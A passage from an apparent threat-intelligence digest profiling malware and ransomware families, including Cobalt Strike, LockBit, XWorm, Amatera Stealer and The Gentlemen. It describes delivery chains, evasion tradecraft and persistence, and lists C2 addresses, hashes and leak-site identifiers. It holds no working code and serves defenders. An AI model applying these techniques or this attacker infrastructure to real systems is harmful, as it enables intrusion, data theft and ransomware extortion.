~/Library/LaunchAgents/com.google.keystone.agent.plist to mimic Google Keystone. The LaunchAgent executes every 60 seconds and beacons system details to a command-and-control /api/bot/heartbeat endpoint. If the server returns code, Reaper decodes it, writes it to a temporary hidden script such as /tmp/.c.sh, executes it with the current user’s privileges, and deletes it, providing a persistent remote code execution channel. Reported anti-analysis behavior includes overriding console functions, running debugger loops, and replacing page content with a Russian-language access-denied message if DevTools are opened. High-confidence indicators mentioned in the content include mlcrosoft[.]co[.]com, hebsbsbzjsjshduxbs[.]xyz, ~/Library/LaunchAgents/com.google.keystone.agent.plist, and ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate.

Cobalt Strike is a legitimate commercial penetration-testing framework that is extensively abused by threat actors, including ransomware operators and state-linked intrusion sets. The provided content repeatedly highlights its Beacon payload, which provides encrypted command-and-control communications for sending host information and receiving operator commands, and notes that Beacon is stealthy and easily customizable. Observed delivery methods in the content include PowerShell loaders used in scripted web delivery, JavaScript droppers, shellcode stagers, and retrieval of Beacon payloads disguised as images or web-associated file types such as CSS, JS, or SVG. One cited capability is use of Smart Applet attacks to disable the Java SecurityManager sandbox. Across the referenced reporting, Cobalt Strike appears primarily as a post-exploitation or third-stage payload. In FrostyNeighbor/Ghostwriter activity linked to Belarusian interests and targeting Ukrainian government organizations since at least March 2026, operators used spear-phishing emails with PDF lures impersonating Ukrtelecom, geofenced delivery infrastructure, and a JavaScript variant of PicassoLoader to profile victims before selectively deploying a third-stage Cobalt Strike Beacon to higher-value targets. In that campaign, reported Beacon artifacts included ViberPC.dll (SHA-1: 43E30BE82D82B24A6496F6943ECB6877E83F88AB) and EdgeSystemConfig.dll (SHA-1: 27FA11F6A1D653779974B6FB54DE4AF47F211232), both identified as Win32/CobaltStrike.Beacon.S. Associated C2 infrastructure in the same reporting included nama-belakang.nebao[.]icu, best-seller.lavanille[.]buzz, and the final Beacon URL https://nama-belakang.nebao[.]icu/statistics/discover.txt. The content also associates Cobalt Strike with multiple ransomware and intrusion ecosystems. The Gentlemen ransomware operation is reported to use Cobalt Strike alongside SystemBC, AnyDesk, PowerShell, PsExec, WMI, WinSCP, Nmap, and other tooling. Karakurt intrusions reportedly used Cobalt Strike together with AnyDesk, Mimikatz, PowerShell, Rclone, FileZilla, and Mega.io after initial access via stolen VPN credentials. Microsoft reported Storm-1811 using Quick Assist and Microsoft Teams-based social engineering to deliver Qakbot, which in turn delivered a Cobalt Strike Beacon, with listed Beacon C2 domains zziveastnews[.]com and realsepnews[.]com. Tropic Trooper infrastructure was reported to host Cobalt Strike Beacon alongside the custom backdoor EntryShell. MirrorFace has also used Cobalt Strike among its toolset. The content further places Cobalt Strike in broader operational contexts: Sandworm-related telemetry included environments with pre-existing Cobalt Strike command-and-control activity; Nozomi specifically recommends treating Cobalt Strike detections as serious strategic warnings. Splunk published detections for a characteristic Cobalt Strike PowerShell loader decompression pattern and for command obfuscation techniques observed in malware including Cobalt Strike. Additional infrastructure references in the content include a historic Cobalt Strike C2 at furfen[.]com, a known C2 IP in Hong Kong at 83.229.126[.]195, and another known C2 server at 118.25.10.65:8088 with beaconing to port 65011. The content also notes that some shellcode overlaps attributed to Cobalt Strike can be false positives because common tradecraft such as PEB walking, API hashing, and position-independent code is shared with other malware.

Stuxnet is malware widely regarded in the provided content as the first known cyber weapon used in a geopolitical context and the opening chapter of state-sponsored cyber sabotage. The content states that it targeted Iran’s nuclear program, specifically uranium enrichment centrifuges at the Natanz facility. It spread automatically from system to system and included an automated propagation component. Its sabotage functionality analyzed PLC logic in Iranian uranium enrichment facilities and injected malicious ladder logic into Siemens PLC-controlled processes to alter centrifuge behavior, with the effect of destroying or disrupting centrifuges while avoiding obvious destruction and preserving plausible deniability. The content repeatedly frames Stuxnet as a precision sabotage tool for tightly controlled or air-gapped environments and as a conceptual predecessor to later sabotage frameworks such as fast16. The material also references an earlier variant, Stuxnet 0.5, with development discussed as early as 2005 and use against Iran’s nuclear program in 2007, while the broader operation became publicly associated with 2010. Aliases present in the content include W32.Stuxnet and w32stuxnet.

Godzilla is a web shell, including JSP and ASPX/ASHX variants, used to establish persistent remote access and execute commands on compromised web-facing systems. The content describes it as a Chinese-language web shell and notes in-memory loading in some exploit chains. It has been deployed after exploitation of vulnerable Microsoft Exchange and IIS servers, including ProxyLogon-related intrusions, and has also been observed on Cisco Catalyst SD-WAN Manager/Controller compromises where public proof-of-concept exploit code was used to drop web shells. Reported filenames include "20251117022131.jsp" and "vmurnp_ikp.jsp". Godzilla is repeatedly associated with China-aligned or Chinese threat activity, including SHADOW-EARTH-053, where operators exploited Exchange and IIS vulnerabilities, placed Godzilla in Exchange and IIS directories for persistence, and then staged ShadowPad via DLL sideloading. It is also described as commonly used by Shadow-Earth-053 and other China-based crews. Palo Alto Networks Unit 42 reported CL-UNK-1068 using Godzilla and ANTSWORD web shells on misconfigured web servers to enable lateral movement and theft of browser history, XLSX/CSV files, IIS/web application files, and database backups across Windows and Linux environments, with activity assessed as likely espionage-focused. Cisco Talos reporting on SD-WAN exploitation linked multiple post-compromise clusters to Godzilla deployments alongside Behinder, XenShell, AdaptixC2, Sliver, XMRig, KScan/QScan, Nim-based backdoors, gsocket, and credential stealers targeting admin hashes, JWT key chunks, and AWS credentials. Additional reporting cited Godzilla among web shells used by TGR-STA-1030/UNC6619 in global espionage intrusions against government and critical infrastructure organizations. High-confidence indicators directly mentioned in the content include the web shell filenames "20251117022131.jsp" and "vmurnp_ikp.jsp" and cluster-associated IPs 38.181.52[.]89, 89.125.244[.]33, 89.125.244[.]51, 38.60.214[.]92, 65.20.67[.]134, 104.233.156[.]1, and 194.233.100[.]40.

Hydraq, also known as 9002 RAT, McRat, Homeunix/Homux, Hidraq, Aurora, and Roarur, is a Windows backdoor/RAT family. The content explicitly identifies 9002 RAT as Hydraq/McRat and notes related naming overlaps including HOMEUNIX. Hydraq establishes persistence by using svchost.exe to execute a malicious DLL in a new service group and by creating a Registry subkey to register the created service; it can later uninstall itself by deleting that value. Its backdoor capabilities include deleting files, loading and calling DLL functions, monitoring services, clearing all system event logs, retrieving system information such as CPU speed from Registry keys, and modifying or deleting Registry subkeys. Hydraq also includes a VNC-based component capable of streaming a live feed of the infected host’s desktop. Its command-and-control traffic is encrypted/obfuscated using bitwise NOT and XOR operations. The malware has been associated in the provided content with China-aligned espionage activity: Webworm previously used McRat/9002 RAT before shifting to newer tooling, and separate reporting cited APT17 activity against Italy using 9002 RAT. The content does not provide a confirmed initial infection vector or specific IOCs for Hydraq itself.

LockBit is a mature ransomware-as-a-service (RaaS) operation with a large affiliate network that has been active since 2019 and was initially known as ABCD. It uses a double-extortion model, encrypting victim data and exfiltrating files to attacker-controlled servers. The malware family has evolved through multiple versions including LockBit 2.0, LockBit 3.0 (also known as LockBit Black), LockBit 4.0, and LockBit 5.0. LockBit 5.0 was launched in September 2025 and supports Windows, Linux, and ESXi, with reporting indicating a primary focus on the U.S. business sector. In Q1 2026, LockBit posted 163 victims and ranked fourth globally after re-emerging following the early-2024 Operation Cronos disruption. LockBit targets organizations across multiple sectors. Reported victim sectors include private business broadly, as well as medical, financial, manufacturing, government, and education. The content also notes continued targeting of healthcare organizations in 2026, including via third-party compromise and supply-chain access. Foxconn has been repeatedly cited as a victim, with LockBit claiming attacks against a Foxconn production plant in Tijuana, Mexico in 2022 and Foxconn subsidiary Foxsemicon in January 2024. Capabilities described in the content include cross-platform encryption using XChaCha20 for symmetric encryption and Curve25519 for asymmetric encryption in LockBit 5.0, randomized 16-character encrypted-file extensions, and a shared ransom note format across variants. The Windows variant includes advanced packing, anti-analysis, and defense-evasion behavior such as process hollowing into defrag.exe, DLL unhooking, ETW patching, event log clearing, self-deletion, anti-debugging, and checks for Russian language or geographic indicators. LockBit 2.0 can disable firewall rules and anti-malware and monitoring software including Windows Defender. Linux and ESXi variants are obfuscated and terminate when analysis tools such as strace, ltrace, or rr are detected. The ESXi variant targets /vmfs/ paths, can terminate virtual machines to unlock files, and is advertised as supporting Proxmox. Observed infection and deployment vectors in the content include exploitation of vulnerable internet-facing enterprise software and abuse of remote management infrastructure. LockBit payloads were linked to exploitation of PaperCut NG/MF vulnerability CVE-2023-27351, including activity attributed in April 2023 to Lace Tempest. Huntress also documented incidents in 2026 where attackers exploited Bomgar Remote Support / BeyondTrust Privileged Remote Access vulnerability CVE-2026-1731 and then deployed LockBit ransomware, likely using the leaked LockBit 3.0 builder. In those incidents, attackers used compromised or rogue Bomgar instances, created privileged accounts, added users to Local Administrators and Domain Admins, and deployed tools such as AnyDesk, Atera, ScreenConnect, and SimpleHelp for persistence and lateral movement. The content specifically notes suspected use of the previously leaked LockBit 3.0 builder in multiple 2026 incidents. Associated behaviors included reconnaissance, privilege escalation, pushing access tools directly to domain controllers, and use of suspicious tooling such as HRSword.exe and PoisonX.sys in apparent attempts to disable security tooling. One observed sample name was LB3.exe, with reported SHA-256 hashes 538b3b36dd8a30e721cc8dc579098e984cf8ed30b71d55303db45c7344f7a4cf and 3529b1422da886b7d04555340dfb1efd44a625c2921af6df39819397176956d6. Related observed email contact in ransom notes was lokbt9@onionmail[.]org. Additional infrastructure-related reporting in the content states that a public IP address and domain hosting LockBit sites were exposed in December 2025, and that the exposed IP had previously been used in SmokeLoader activity in 2022 and was linked to rodericwalter[.]com, suggesting possible infrastructure reuse or rental. At the time of one analysis, the LockBit leak site contained 60 victim entries, with the first listed on December 4, 2025. Overall, the content characterizes LockBit as one of the most prolific ransomware families, with broad affiliate-driven targeting, strong Windows/Linux/ESXi support, extensive defense evasion, and repeated use in intrusions involving enterprise software exploitation and compromised remote management platforms.

INC Ransomware, also referred to as INC Ransom or Incransom, is a ransomware operation that emerged in mid-2023 and is described in the content as operating in a ransomware-as-a-service model. It conducts double extortion, stealing data and encrypting victim systems to pressure payment for decryption and non-disclosure. Reported targeting includes healthcare and professional services, with activity initially focused on the United States and United Kingdom before expanding into Australia in mid-2024 and later into New Zealand and Tonga. The content also notes incidents affecting healthcare providers and industrial entities, and cites the group among the highest-volume ransomware threats in FBI complaint data for 2025. Observed initial access methods include phishing, use of compromised valid accounts including RDP access, purchase of access from initial access brokers, and exploitation of public-facing applications, specifically including CVE-2023-3519 in Citrix NetScaler. Post-compromise behavior includes scanning for domain administrator accounts, enumerating domain groups, network shares, and services, testing connectivity over RDP, and using tools such as Advanced IP Scanner, NETSCAN.EXE, Internet Explorer for share discovery, PsExec, WMIC, AnyDesk, and PuTTY. The group has used 7-Zip and WinRAR to archive data, staged data on compromised hosts, and exfiltrated data with MegaSync to cloud storage. Defense evasion noted in the content includes disabling Windows Defender via SystemSettingsAdminFlows.exe, renaming PsExec to winupd, uninstalling tools after use, and using Mimikatz to steal passwords. Huntress also documented February 2026 activity in which an actor deployed INC ransomware after using PsExec for privilege escalation, creating a scheduled task named "Recovery Diagnostics," using a renamed copy of Restic for staging data to a Wasabi S3 repository, uninstalling VIPRE Business Agent, disabling Microsoft Defender real-time protection, and launching the ransomware from c:\perflogs\win.exe with arguments "--sup --hide --mode medium." In that case, INC-README.txt ransom notes were created. Huntress provided SHA256 hashes 1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d for C:\123\edr.exe and e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13 for c:\perflogs\win.exe. The content links INC affiliates to broader cybercrime infrastructure and ecosystems. Microsoft tied ransomware affiliates responsible for delivering INC, Qilin, and Akira to the Fox Tempest malware-signing-as-a-service operation, which abused Microsoft Artifact Signing to issue short-lived certificates used to sign malware. Additional reporting cited in the content states that INC Ransom and Sinobi share 55.9% function similarity, and another source notes Lynx shares 48% of its source code with earlier INC ransomware. The content also mentions possible association of some deployments with actors previously linked to INC ransomware, also referred to in one mention as Warble. High-confidence victim reporting in the content includes a May 2025 healthcare breach in New Zealand involving data theft and encryption, a June 15, 2025 attack on Tonga’s Ministry of Health that disrupted information and communications networks and core national services, and an underground-forum claim observed by CYFIRMA that JA Akita Kita Life Service, K.K in Japan was compromised, with approximately 43.1 GB of data allegedly stolen.

EchoCreep is a Go-based backdoor used by the China-aligned APT group Webworm, which is also tracked as Space Pirates and UAT-8302. ESET reported that Webworm introduced EchoCreep in 2025 as part of campaigns targeting government organizations in Belgium, Italy, Poland, Serbia, and Spain, as well as activity involving a university in South Africa, amid the group’s broader expansion from Asia into Europe. EchoCreep uses Discord for command-and-control communications via crafted HTTP requests to Discord APIs. Reported capabilities include uploading files, sending runtime reports, receiving commands, downloading files, and executing commands through cmd.exe. ESET decrypted 433 Discord messages associated with EchoCreep and identified four unique Discord channels corresponding to different victims; recovered logs indicated the first actual EchoCreep compromise occurred on April 9, 2025, while Discord channel activity dated back to March 21, 2024. EchoCreep decodes commands with base64 and decrypts them using AES-CBC-128. The delivery mechanism and initial access vector for EchoCreep are currently unknown. ESET attributed the activity to Webworm through decrypted Discord messages, infrastructure overlaps, and an attacker-operated GitHub repository used to stage malware and supporting tools.

XWorm is a modern .NET remote access trojan (RAT), sometimes described as having worm capabilities, that is widely used in commodity malware campaigns and Malware-as-a-Service activity. The provided content references variants including XWorm V3.1, V6.0, V6.4, and V7.4, as well as an XClient variant and an XWorm/njRAT hybrid. Reported capabilities across the cited campaigns include full remote control, password and credential theft, keylogging, screen capture, webcam activation, file access and transfer, process injection, plugin-based extensibility, clipboard monitoring, USB spreading, hosts file manipulation for DNS hijacking, DDoS attacks, and in some cases file encryption or ransomware-capable behavior. One variant also used Telegram-based C2 notifications, and another implemented a BSoD kill switch via RtlSetProcessIsCritical. Observed delivery and execution chains are varied but consistently multi-stage and evasive. XWorm was delivered via phishing emails, fake invoices, fake software updates, steganography-hidden payloads in image files, VBScript droppers, JavaScript and HTA/MSHTA chains, BAT/WSH/WSF staging, PyInstaller-packaged loaders, Go-based loaders, and Python-based loaders that bundled full Python runtimes. Several campaigns used Donut shellcode, AMSI and WLDP bypasses, RC4 or AES-based payload protection, Early Bird APC injection, process hollowing, or shellcode injection into legitimate processes such as explorer.exe, notepad.exe, caspol.exe, and Msbuild.exe. In one PyInstaller campaign, XWorm V7.4 hid itself as %LOCALAPPDATA%\Win.Kernel_Svc_AJ8iOw.exe and connected to 68.219.64.89:4444 using an AES secret key. Another campaign delivered XWorm shellcode via info.py, while a separate Go/ScrubCrypt chain delivered XWorm v6.4 configured for 204.10.160.190:7003 with mutex Cqu1F0NxohroKG5U and install name USB.exe. The malware appears in multiple active 2025-2026 campaigns and clusters. The content directly associates XWorm with SERPENTINE#CLOUD operations, including German-language fake DATEV invoice lures and UK-themed Cloudflare Tunnel/WebDAV delivery chains. It is also referenced in Amadey pay-per-install activity, steganography-based phishing tracked by Cofense, PyInstaller abuse documented by Point Wild, and campaigns using LocaltoNet tunnels, DuckDNS, No-IP DDNS, and residential or VPS-hosted infrastructure. One report describes a compromised XWorm MaaS panel hosted at 84.201.14.2 that tracked 1,893 victims and multiple operator accounts. Another campaign was linked to a Turkish-origin actor using the GitHub alias flexhere687-art. The malware has been observed targeting multiple sectors, with lures themed around invoices, finance, logistics, government, and software downloads. High-confidence infrastructure and indicators mentioned in the content include C2 endpoints such as 68.219.64.89:4444, 204.10.160.190:7003, 178.16.55.160:2323, 43.157.1.71:2323, 85.137.253.58:9000 and :9090, hy647dhon.duckdns.org:8292, laohe1.myvnc.com, alzap.ddns.com.br, mzsgu2rhxn.localto.net:3480, windowsupdateservice.localto.net, and c.ultaicloud.com:10013. Additional filenames and artifacts directly tied to XWorm in the content include Win.Kernel_Svc_AJ8iOw.exe, afacan313131.exe, Token GrabberV2.exe, XClient.exe, taskhostw.exe, and mutexes such as lOyuApQB7sBGSt3o and Cqu1F0NxohroKG5U.

Amatera Stealer is a commodity information-stealing malware family and Malware-as-a-Service offering, also referred to as Amatera, and described in the provided reporting as a rebranded version of ACR (AcridRain) Stealer. It has been linked to the threat actor SheldIO and is positioned in reporting as a successor or replacement to Lumma Stealer. The malware has been observed in multiple 2026 delivery campaigns targeting Windows and, in some reporting, broader cross-platform developer-focused lures tied to fake software installation pages. Observed delivery vectors include ClickFix and InstallFix-style social engineering, fake CAPTCHA or human-verification prompts, Google Ads malvertising, cloned Claude Code installation pages, phishing, fake software downloads, cracked software lures, Discord-delivered verification pages, and multi-stage loader chains involving MSHTA. Reporting also describes delivery through CountLoader, Emmenhtal Loader, and abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs. In Windows-focused chains, victims are tricked into copying and executing malicious commands via the Run dialog or terminal-like install instructions, after which mshta.exe, PowerShell, HTA/VBScript, or in-memory shellcode loaders are used to retrieve and execute Amatera. Capabilities directly described in the content include theft of browser-stored credentials, cookies, session tokens, browser data, crypto-wallet information, wallet browser extensions, desktop cryptocurrency wallets, Discord data, Signal data, password manager files, system information, and files from user directories including Downloads. One report states the malware expanded harvesting to 65 browser targets, 165 wallet browser extensions, and 137 desktop wallet targets, and that its file grabber searches for wallet exports, seed phrases, private keys, passwords, JSON, TXT, PDF, KDBX, and wallet-related files. Additional reporting states it targets information from the user folder and similar victim data to LummaStealer. Behavior and technical characteristics described in the content include in-memory execution via reflective loaders and shellcode, string encryption using XTEA, syscall resolution and hook evasion using RecycledGate/FreshyCalls-style techniques, anti-debugging, anti-analysis checks, and geofencing behavior that exits on Ukrainian keyboard layouts or when certain Kaspersky driver files are detected. One eSentire report states the malware changed C2 protection from AES-256-CBC with a hard-coded key to ECDH over NIST P-256 followed by ChaCha20-Poly1305, initiates C2 with HTTP POST requests to the root path, and uses the X-Request-ID header during session establishment. Other reporting states Amatera communications may be routed through legitimate CDN infrastructure, and one campaign used Cloudflare-fronted infrastructure with payload gating based on a curl/ User-Agent substring. Associated targeting in the provided content includes a finance-industry customer environment observed by eSentire, enterprise-managed Windows environments implied by App-V-dependent delivery, and developers or users searching for AI tooling such as Anthropic Claude Code. The broader lure ecosystem includes AI tool impersonation and shadow-AI usage scenarios. High-confidence indicators mentioned in the content include the remote server 144.124.235.102; initial dropper URL hxxps://download.version-516[.]com/other; second-stage domain oakenfjrod.ru; C2 indicators 77.91.97.244 and compactedtightness.cfd; Windows infection URL hxxps://claude[.]update-version[.]com/claude; campaign infrastructure contatoplus[.]com; and PNG/payload delivery domains such as gcdnb.pbrd[.]co and iili[.]io. Sample hashes explicitly provided include shellcode loader SHA-256 e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508 and unpacked Amatera sample SHA-256 ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772.

Emmenhtal Loader is a multi-stage malware loader used to deliver commodity malware, particularly information stealers such as Lumma Stealer. Bitdefender reported it as part of active MSHTA-based infection chains observed in 2026. The loader is associated with ClickFix-style social engineering, including fake human-verification and reCAPTCHA/CAPTCHA pages, as well as phishing messages on Discord. In the observed chain, victims were tricked into pressing Win+R, pasting a clipboard-copied command, and executing mshta.exe against a remote HTA payload. The HTA payload executed directly in memory and was described as intentionally bloated with garbage data to hinder analysis. A later stage launched PowerShell to download and execute a remote script in memory without writing it to disk, and the PowerShell stage included an AMSI bypass by patching clr.dll before decoding and loading a .NET assembly in memory. In the analyzed case, the final payload was LummaStealer. The malware targets Windows systems through abuse of built-in Microsoft utilities such as mshta.exe. Reported indicators include SHA256 hashes AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9, 02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE, and 1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84. Related reporting also states that ClearFake used ClickFix and CAPTCHA challenges to deliver Emmenhtal Loader, also referred to as PEAKLIGHT, which then dropped Lumma Stealer.

BlackCat, also known as ALPHV and Noberus, is a ransomware-as-a-service (RaaS) malware family and operation that emerged in late 2021. The malware is written in Rust and is designed to operate across multiple operating systems, including Windows and Linux. Under the RaaS model described in the content, core operators maintained the malware code, updated capabilities, and managed negotiation portals and data leak sites, while affiliates conducted intrusions and deployed the ransomware. Revenue sharing cited in the content allocated 20% of ransom payments to the operators and 80% to affiliates. The content states that BlackCat/ALPHV spread through stolen credentials, phishing emails, and exposed Remote Desktop Protocol services. After access was obtained, affiliates moved laterally within victim networks, disabled security tools, encrypted critical files, and demanded payment in cryptocurrency. The operation also used extortion infrastructure and leak sites, and the content notes incidents in which stolen or leaked data, including patient data from a doctor’s office, was used to pressure victims. BlackCat/ALPHV is associated with high-impact extortion campaigns and is described in the content as having targeted more than 1,000 victims worldwide, including U.S. businesses in medical, engineering, pharmaceutical, drone manufacturing, and healthcare-related sectors. The content also notes that ALPHV/BlackCat activity and tooling influenced later ransomware ecosystems and that the Nitrogen operation initially used a loader that deployed BlackCat/ALPHV payloads before later developing its own ransomware. Additional reporting in the content references BlackCat’s use by affiliates and mentions its role in attacks against multiple U.S. companies during 2023. Threat actor associations directly mentioned in the content include affiliates Ryan Goldberg, Kevin Martin, and Angelo Martino, who admitted or were convicted in connection with deploying ALPHV BlackCat against multiple U.S. victims in 2023. The content also references FBI reporting that Iranian actors partnered with affiliates of the AlphV ransomware operation and took a percentage of ransom payments. Another cited segment characterizes BlackCat/ALPHV as the ransomware component in an alleged intrusion chain involving Scattered Spider, though that claim is presented as commentary rather than law-enforcement attribution. Operationally relevant details in the content include that the FBI disrupted ALPHV BlackCat in December 2023 by developing and distributing a decryption tool to victims and seizing several BlackCat-operated websites, actions that reportedly saved victims approximately $99 million in ransom payments. The content further notes that BlackCat as an entity has largely disappeared, but its tooling, affiliate ecosystem, and influence continued to be referenced in 2026 reporting. High-confidence aliases from the content are ALPHV, ALPHV_BlackCat, BlackCat, and Noberus.

The Gentlemen is a ransomware-as-a-service (RaaS) operation that emerged publicly around mid-to-late 2025 and rapidly became one of the most active ransomware threats by early 2026. It is described as a double-extortion operation that steals data before encrypting systems and threatens publication on its leak site if victims do not pay. Reporting in the provided content links the operation to a Russian-speaking administrator using the aliases zeta88 and hastalamuerte, and assesses it as connected to or a continuation of prior affiliate activity associated with the Qilin ecosystem. The malware supports multiple enterprise platforms. The Windows locker is written in Go and requires a password argument at execution, a behavior noted as helping evade early detection and sandbox analysis. The broader locker portfolio includes variants for Linux, NAS, BSD, and VMware ESXi; one report states the ESXi locker is written in C. The ransomware uses XChaCha20 and X25519 for encryption, with reports also describing hybrid encryption and partial encryption of large files to accelerate impact. Encrypted files may receive random six-character extensions, with examples including .7mtzhh and .ojuopo. The malware drops a ransom note named README-GENTLEMEN.txt or READMEGENTLEMEN.txt and is associated with the wallpaper/artifact gentlemen.bmp. A publicly described decryptor recovers X25519 ephemeral keys from process memory dumps. Observed behavior includes stopping services and processes related to databases, backups, virtualization platforms, remote access tools, and enterprise applications before encryption; deleting shadow copies; clearing event and RDP logs; disabling or tampering with Microsoft Defender and firewall protections; adding exclusions; and, in some reporting, enabling SMB1, loosening LSA anonymous access, wiping free space, and removing forensic artifacts. The Windows variant supports built-in spreading and domain-wide deployment, including use of harvested credentials, WMI/WMIC, SCHTASKS, SC, PowerShell Remoting, and Group Policy Objects. Reporting also notes self-restart, run-on-boot capability, and a Windows silent mode that encrypts without renaming files while preserving timestamps. The ESXi variant is described as shutting down virtual machines, disabling automatic VM recovery, and using persistence paths such as /bin/.vmware-authd, rc.local, and cron. Initial access and post-exploitation tradecraft in the provided content include abuse of exposed remote services and compromised credentials, especially Fortinet FortiGate VPN appliances and Cisco edge devices; brute forcing; exploitation of known vulnerabilities; purchased access from brokers; and use of stealer-derived credentials. Specific vulnerabilities tracked by the operators reportedly included CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073. Affiliates conduct Active Directory reconnaissance, privilege escalation, credential harvesting, Kerberoasting, lateral movement, and mass deployment. The operation has been associated with tools and malware including SystemBC, Cobalt Strike, AnyDesk, Advanced IP Scanner, Nmap, WinSCP, PsExec, WMI, PowerShell, NetExec, Mimikatz, RelayKing, Velociraptor, PrivHound, CertiHound, PowerRun, KillAV, and multiple EDR-evasion utilities. Reported C2 infrastructure associated with activity includes 91.107.247.163 and 45.86.230.112. The operation targets enterprise and infrastructure organizations globally. Victim reporting in the content spans roughly 70 countries, with strong activity across APAC, Europe, Latin America, and North America. Sectors explicitly cited include professional services, manufacturing, technology, healthcare, construction, insurance, financial services, IT, government, and education. Multiple reports characterize The Gentlemen as especially significant for healthcare and other critical infrastructure-adjacent organizations. Public victim counts in the content vary by source and time period, including 166 victims in Q1 2026, around 332-352 claimed victims in the first months of 2026, and telemetry tied to SystemBC suggesting activity across more than 1,570 enterprise environments, indicating public leak-site counts likely understate total compromises. The operation uses an affiliate model with reporting that affiliates receive 90% of ransom proceeds. Its infrastructure includes an affiliate panel supporting payload generation, victim and negotiation management, ransom estimation, stolen-data uploads, and decryptor management. Negotiations are reported to occur via Tox or Session identifiers, and the ransom note references the onion leak site tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion. High-confidence indicators mentioned in the content include the ransom note filenames README-GENTLEMEN.txt and READMEGENTLEMEN.txt, the wallpaper/artifact gentlemen.bmp, the onion site above, the TOX ID F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E, and sample SHA-256 51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2 for a Windows sample.